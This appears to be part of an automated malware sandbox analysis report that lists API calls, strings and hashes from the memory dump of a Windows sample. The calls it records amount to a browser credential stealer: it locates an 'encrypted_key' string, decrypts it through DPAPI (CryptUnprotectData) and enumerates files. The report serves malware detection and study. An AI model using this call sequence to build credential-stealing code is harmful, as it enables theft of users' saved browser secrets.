                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00C01580,00C00D92), ref: 00BEF54C
                              • lstrlen.KERNEL32(00000000), ref: 00BEF56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 0ae13e6753ea0b087c1678fdf07a1a9464c0836c1e0cd516d33392f96d2f782d
                              • Instruction ID: eca33bde6535c4470873d54e4e456c6c8bd132d2505820970f73e6dd970f7e47
                              • Opcode Fuzzy Hash: 0ae13e6753ea0b087c1678fdf07a1a9464c0836c1e0cd516d33392f96d2f782d
                              • Instruction Fuzzy Hash: 7F5111B1D0010DAADB08FBA4DC52DFDB3B8AF54340F408568F91A67195EF746A0DCBA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 5e4724eac8ff119753571ae190c83ed5c208353b6ab682d324b9606fa3416c36
                              • Instruction ID: 3d0a1c9e631c58bb27763c0ef795e6dca17e7f28a2cb0c587efa3630d0beec9e
                              • Opcode Fuzzy Hash: 5e4724eac8ff119753571ae190c83ed5c208353b6ab682d324b9606fa3416c36
                              • Instruction Fuzzy Hash: 83413FB1D1410DABCB08EFA4D895AFEB7F8AB54704F148058E616B7290DB746A09CFA1
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
                                • Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
                                • Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
                                • Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
                                • Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
                                • Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A
                                • Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BE9D39
                                • Part of subcall function 00BE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9AEF
                                • Part of subcall function 00BE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B01
                                • Part of subcall function 00BE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9B2A
                                • Part of subcall function 00BE9AC0: LocalFree.KERNEL32(?,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B3F
                                • Part of subcall function 00BE9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BE9B84
                                • Part of subcall function 00BE9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00BE9BA3
                                • Part of subcall function 00BE9B60: LocalFree.KERNEL32(?), ref: 00BE9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: a855459a615e256084c70a52f7b7092c2580fae88e9f249d89e7ab6c3226afad
                              • Instruction ID: f8ffe06396fa636e8a3e028cc004af9c2001d057037bce52085bdca011d081da
                              • Opcode Fuzzy Hash: a855459a615e256084c70a52f7b7092c2580fae88e9f249d89e7ab6c3226afad
                              • Instruction Fuzzy Hash: F43112B5D10219ABCF14DFE5DC85AEEB7F8EF48304F144569E905A7241E734DA08CBA1
                              APIs
                              • CreateFileA.KERNEL32(00BF3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00BF3AEE,?), ref: 00BF92FC
                              • GetFileSizeEx.KERNEL32(000000FF,00BF3AEE), ref: 00BF9319
                              • CloseHandle.KERNEL32(000000FF), ref: 00BF9327
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: b5700113505235d34fb31ccf1f131258a684f9bd90fe688188d47b67417393a8
                              • Instruction ID: 0eff473c34b7d8f7334fa30c7ff7e4c0c9e828dc28d13dcfb79b1a762e9303a4
                              • Opcode Fuzzy Hash: b5700113505235d34fb31ccf1f131258a684f9bd90fe688188d47b67417393a8
                              • Instruction Fuzzy Hash: 72F04F35E40208BFDB20DFB5DC49FAE77F9EB48710F10C2A4BA51A72C0D6B096058B44
                              APIs
                              • __getptd.LIBCMT ref: 00BFC74E
                                • Part of subcall function 00BFBF9F: __amsg_exit.LIBCMT ref: 00BFBFAF
                              • __getptd.LIBCMT ref: 00BFC765
                              • __amsg_exit.LIBCMT ref: 00BFC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00BFC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 90b41280dae49e0e02b082cd3b1201284025ae6461d96d629c4af9f46b39af84
                              • Instruction ID: 8ef5549a9d804962c196f3fdba962e98aa1c1c87a03670b453ddaf8f4a8b7389
                              • Opcode Fuzzy Hash: 90b41280dae49e0e02b082cd3b1201284025ae6461d96d629c4af9f46b39af84
                              • Instruction Fuzzy Hash: F3F06D3290420C9BD725BBB89906B7D7BE0AF00720F2541C9F604AB1D2DB645D88DF5A
                              APIs
                                • Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF4F7A
                              • lstrcat.KERNEL32(?,00C01070), ref: 00BF4F97
                              • lstrcat.KERNEL32(?,009B89A8), ref: 00BF4FAB
                              • lstrcat.KERNEL32(?,00C01074), ref: 00BF4FBD
                                • Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF492C
                                • Part of subcall function 00BF4910: FindFirstFileA.KERNEL32(?,?), ref: 00BF4943
                                • Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FDC), ref: 00BF4971
                                • Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FE0), ref: 00BF4987
                                • Part of subcall function 00BF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BF4B7D
                                • Part of subcall function 00BF4910: FindClose.KERNEL32(000000FF), ref: 00BF4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                               • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 6b9d31f60ea50429d18f08a55b508ef0c73fc27d396513cf910e1079df16de05
                              • Instruction ID: c075f93ac17242b35815758337b4a01eaf4008b5737d928b4345dee1892586cd
                              • Opcode Fuzzy Hash: 6b9d31f60ea50429d18f08a55b508ef0c73fc27d396513cf910e1079df16de05
                              • Instruction Fuzzy Hash: 57216B769002086BC768FB70DC46EFE73BCAB55700F0445A4B659A7181EEB497CDCB92